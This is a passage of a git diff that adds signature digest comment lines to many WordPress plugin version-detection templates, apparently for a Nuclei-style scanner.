-46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100da66ca71afe555dab410fe34a0b8e2f7976f2fa3c769f4e238361523d56d95fa02206b3e35ad57a422958daa04a85da73378a3718a6a17f57ff448e31d49d1294567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d31..666b6decf84 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dcc288942f53c8e1ec5a1dfb91c87cbbb8f60e189267ee736e992fa3f738eef30220042ab9be4b520bc411b7a8c195d511b08f80104568ce4b8583bcbfdf0b6f07a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db688..23694173dfc 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207b82497efafc269d4414f7737d13b0bccdb873c8817d44f6dec61859bfd922100221008aa78d84819dfec246dbfe7a4c619ebdc6f576c5ec65da9b704e9a7eb364748e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3dbb..d65055a3e6c 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085b4fd770dfa661f81bfc77fcf505342391e6d7b0721aca5e6399f04542dd6fc022100951ce549addcd1a6dcdf2bfb699591ede6ab07a7c12028e79e4058322e13ced1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca381..4b7f05a78b8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e566aa07fa0d3703964b107cd0bccd39761853a2cccbea866b05ae3b959cc100220665b95c2725d338737ce0484399b6d5b799ae75c2908d3952db1b63463d9fdd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255b..5c51a925b05 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205caec4b547bc85e47b2909a4ca8cd1dfcdc3fdcdfacfb29e3e23d0c8d77fe8fd022100a3ba8e3306207aa8ca6a977b0061de572a1f1218a8dad9fe1f41639951ea18bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d00..40fdd8aa1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ab33ab960bd254b43988d4eb516c303c728df599bd38144883ccef0335163648022100a645d4bb15d29e4532399d987839a2ded8c914c321e6bc0324669458fbb1b604:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed51..9709ebf1e5f 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022053de2a3f3609d09f17b179b01dfe45509cf0ba754f73c16ffd5c0b0ea6c5f049022100896101016b646a73527ea408edc09bbd55898ed7b8c72cd0c507f1ceb6956b66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b1..c9822ca1a3b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022049a36f46d127c5aaa591e63f1eab1b173d9099b58a680da2198b5260990640ab022100bb6776c205fc892c6c17d973734315d556ded32932f5ee253851b5042a559730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3e..76af04fb155 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e0ea23afa4741fd3efc7217774934521786c197c68a97d821c6a0a0231fbce5602204e439c844ab619fdec229ca7a9c5ef82a2f730af81144b7e10361f80063ef00f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec50..35fc8a96786 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009b14a708aa3410fb1dcfd245e8faf2bde934a440841e3b7fcad9f42be7e9c058022100d48eb97f15c1c638bdbf62c186c3560c68b8f37db70f24d3ef6a8e0f3cbb1b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a2203..534f8dc8e64 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c45c1feb21a189012ccf13eb61ac7c07382913b275cb14f046601a46dfe49baa0220572693fdc965f9a33d51b81fc60d671ad82e7d5f4b37133dfac637a48515b42b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453e..1377a3b95e7 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c2b9acfcdd2beacfd281d03ee8629f34514c969eab251dcb908e8e1b32aa812a02202479485e8d51c76922e387bc70bd8020db87352ed3179de160a1cc83f54726ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac08..192ebbe2f62 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c67f3a4e61b94cda233ab41ee5b2ad88772e775e993c94d2cef9569cba2bcc9902201266b973bf09a9024886a997ac55a4ccf1e35f7b392ef11e93fce946e7627927:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca9..062aaaf76e6 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022023485b9d1c97ef81caaf28db89d189f080c7c703b88951fd38ea03201228141f022005b641e18ee83930af7d9c58e2f3b009acbb8b98d86d62fef20ee0d9ee65a6f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82db..0f568960dd3 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ed96f8e99c42e97f3ba1027d0fd404a055aa9f487778e29556be3134c1b0411e02206ef65ba327dd6ea6731af2f33e4ce841ce65338d2af14071bd70d63a9de42182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201fc..d0788d69a17 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009d3983bc5c1b11d6f1e37e06c26e46d062658f372f1036e14079ef2c055f178a0220529cf91b9dc008e90223531238ca83851ae84132fc5136de3d82b25171f57c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d07..7ad8f7fcb12 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024adddef1cc8575045628e710a92492932ea826dea9675d8184feff4aa53692a02207f2c22cb18be07a65c18d859d2210d7b6b3b36499dcd893541e3fd2a01fcca4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78a..5b3756a8e62 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022054db2a79331ce53cfa3377b5007bf2a2813e266520bf7b67c9b39cb4aa1fce87022100c7d8aa26237209fbe40d963bc6686ad694877db2be39881ad842e1895ce009f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8eaf..fc21c8f2dbb 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e5a7ebe491eac618d380f20010d3ee8e990e25cba87819a8a6038cf67e79251a022100fd900801243ea273ecf33b99fcd808204a2854adb58264f57118331195420878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e1..39139aa0acd 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070a70eacb3d380d3a14896ca1465cf52e2a5931b8e1127fb8fad8613b6e00c9702205f5f214c3c3bcd063129741fb132ee08bc3915517ef60cd8ff751fa9a816873e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389dc..2498267cdb4 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe55a94bc34146352ee1f7a00f8b921744537cc10341a01ca0557c796c82e72402207e117c2003c306137f6ee05ec16be75d4ac3b1b5746b95d5e296bd5d4d9e2453:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492c..310553eab40 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022001f906d2d1443971efbab8036bf86942ee1001971094887b274fe6bdd7212897022062e2618ac132770d8a570a3d367136ec7c8e76fdefb2dc9b3bc0ab8b32944d6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d1..a5627a73560 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100996c65504fa276044ff9a72b4ffe8a597f69cec349e8b30793cda937e34eca51022100a6b6262a8058645b3e8270081f059d20c74ef2d8c2463da7e188dcc22c0ac6f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee79807..4e07bace101 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203a4dd51509f4ddbb3e2d418da8ff0d7e0b7445ddb2be368fa04863c40b7ee15402206c6114fd46261569eb9172a017efb7fcacf661a3d6a1ebd0666982cd04a8edf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767b..62f827371c9 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206f5906419027ca4e28dc5b5184a6fd3feaa0849a2bf1ef6f0140e71131b736d3022027400b303eff4f75389da5c5589f5f771c882484daeed6c81501b3579dcac971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073ca..0234036af97 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206c839da4ffae139e62619270f1fb153b917417a8bc0f02e0da3aebac03a12ae402201c104d8e26358d74626544d7a7e7f4fba7e3e69ce633cbcad378c6a905327ab4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55f..27a1e88fcf6 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022059e9b8b59ef8a551ce14b2421a39e935471f958bde959a0c93e6d6892ca68ef6022005856757f5c912a57b2b7b42ade6bdd5e2227620728baa6689420fa211207d9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692e..74c06b9e8d8 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205bf1eb2f2c55f526ca76f8c5c9c25ac399f8c0e82f0b3a10dca29751597b5926022100b37309bff87f069707fdb6e039fb68dd6ed64c9cc3f0805e254e6470cfd6149c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f3..4dfda70cca9 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f121452f259672f5b407053694c483358ccee96bd2395aa631cc1198e76bde7022100d49938705cb53862344a047ad2fc4477979aeaa6a52368e55d4b65c358b3dce3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316c..8e23752da0d 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a7afa6dcad2825c17c4ad45c79336afb59dc3afa80bafbb6f6779d4d7a178a70022100831f2ff96aac7869011749e444b59ba42b13ac929f7f1b34d7df3f8c8b73900f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff207791572..6b120a1097e 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ad2ef908c15967ebb585997a30acada7f70043ed1b3db5f2726a19aae0775471022023285d1247296434ac8753be7c16f4c30019f6221806e75de7d469153308929d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017a..71cf83cb9b5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201e3c7e6476ab9770c7729acbef636ae99c70faf2276462d8856ba0f5f220e7d102210092b8e793c9004c8a637cea84f2a8d1ae5458ec703a38c25ece127475ecffb8e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d5..a6238f92cdb 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220712a774777fd430603104a71ca2050ee25b5f6059d409aa01d11ce854be41f22022100864927351753149ec79a124b443d634df21312f1443773f95f1efcea63d00d46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf56..52d4a0c30af 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022000b4887dd169d4f20dbec9ffd099920de0cfb8aab7ad6e072b8d7ab967793505022100aaebb02d59c636d322d2f7263e709bf9b0443b53365e52e8b4d001fc1c495b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94b..b09a567b645 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068d8281eccca3adcaf0f73fda79ec2dd4578e239f25143e75eea16036022826c022100d93a42f74c0a37e5939fc49a80904752d8012b32487e475d29833df2f6d37046:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709d..83baac132e3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022022278b708e3696d38c407449ea7ba2813ac3410cd73bf7f994302aadcfa060f4022023db93cffa53f8c26951e0423acf14bc8551b378c92cb9f661f819be43ca0075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c276825..daf2c7ab046 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022066cf876baa9b565ab6541d1dfcfeb3ecfed665f86eab9ac51408245b095588ab022100ee6c165cc7a94c4dbd81cb463d3e26f1c7bbcde588864acf3d4f9774c4d348c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b1..bee4359f5e8 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022005a6dd258ff77aab78c18fbf983b6ae48552984aabda65c1c7ba35024501a4e9022100c36541820ba03c166388d50dd68d28e8df91b07a5d5439868239ab1f0121d4e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a9..383e0b34095 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008c062d8b4b21803d6faee3dc304cc9439a971a63406ba6647c0e56c95c02b947022100851d7a1dba1a0c54c3d323c31b2d06b19e21986f0ceceaabc97281089434d223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb856..a2602c428fa 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aea99cdb5e168ef33afda2938481c3dcafb9196ae0d8e1592a33e46c1b0c1ee2022100efa19a4ca4d634992caa586ed1f998919e69176c6c413d02a4d91298c36b9551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c63..8a4e6c5e954 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100979b8db91d3c72ea91359957ccd92746a20d60a266e1274432ab492c9f3ba703022025502058d452a7766430cb00498061d19bc176fe96fb1918cbc600e69ba19ab0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a342590..f49477e5311 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e5aabb2bee253960734b84bc5e8234701281cbd21e8d44ed3a8eb5ad24beb8702205bcf0081803875ec3ef0d02fa60a326a86be50bde4dd425c651937ffb2447350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a4..c680f9bd70c 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220155ff5f184e83253a5ec48786e9b26f5566e3a736e25950fc010c292d6caad53022100811bcb0294a3f3878a37cf8389f7bdf6c9f5f0970686e1106ecda3f502117558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4be..b1eac7585c3 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d1ddc3de05b2efcc4b20c7c2f1136c05a04d851eca0a29bc96c9d20df4287c69022056e1756ea4f987e5c1e7e68fd2decb4a0fdc9970b218c180b4615c6da2b7a793:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed14..7d97737d04c 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200abfbd4e30f5bdaca1611d5adfe588ed436ea70b20c5c6bf44e930cc2b79cd520221009febda1024b6e8259c977c05374e6e605fec28aaf3b0fec1f7035b972d059d06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274b..390e137cacf 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022007bdf88fe4ebfc78b25ecb872b24b1e483af0bd72611ebab819a3110e600989e02201182a88be9143767c59c7d02d14a655748d0eeb5322c97c6efbe29833afc246e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec66..f866a5533c4 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 